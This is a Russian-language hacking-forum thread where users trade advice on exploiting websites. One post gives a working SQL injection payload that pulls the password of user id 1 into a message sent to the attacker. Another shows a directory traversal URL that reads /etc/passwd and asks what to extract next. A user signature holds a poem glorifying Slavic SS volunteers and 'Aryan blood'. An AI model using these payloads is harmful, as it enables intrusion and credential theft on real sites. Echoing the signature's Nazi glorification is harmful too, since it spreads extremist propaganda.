ну, что можно раскрутить как слепую, я знаю

а если как обычную, ни как?

я имел ввиду через ерор базед

опечатался, с кем не бывает)

меня больше интересует, раскрутить как обычную...

Не сочти за трололо - но "как обычную" - это как ??

Охотник предложил тебе полностью рабочий вариант, с максимальной выдачей информации ( не Blind и не Time-Based), а что ещё тебе надо ?

Следовать классике - имхо, дурной тон. Это шаблонное мышление, так ты далеко не уйдёшь. Так и останешься работать на старенькой Win95 ?

В уязвимостях, как я считаю, нет понятия "обычная". Все они "необычные" - разные и требуют разных методов реализации. А если ты следуешь шаблонам и по-другому не умеешь мыслить и реализовывать, может дальше и не стоит пробовать, а ?

З.Ы. для люителей шаблонно мыслить

Всем привет! Есть вопрос ... Можно раскрутить инклуд в таком коде?

П.с волнует вопрос если можно обрезать то что идёт ДО переменной

Жирным подсвечены поля, которые приходят из формы и не фильтруются. Что можно выполнить при таком раскладе?

а какой ты результат хочешь?

__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.

Ну к примеру я знаю основные поля и таблицы другие, хочу к примеру отправить самому себе в сообщении пароль от первого idшника...

http://www.mysql.ru/docs/man/SELECT.html

INSERT INTO table1 (user_from,user_to,message,edittime) VALUES('10','10',(Select `pass` From `user` WHERE id=1),'1347608937')+--+#user_to,message,edittime) VALUES('10','10','mess','1347608937')

Здравствуйте нашел Directory Traversal

http://site.ru/download.php?file=%2f..%2f..%2f..%2f..%2f..%2f..%2 f..%2f..%2f..%2f..%2fetc%2fpasswd - файл отлично выводиться, что делать дальше? Что можно из этого извлеч? Ранчше с этим не сталкивался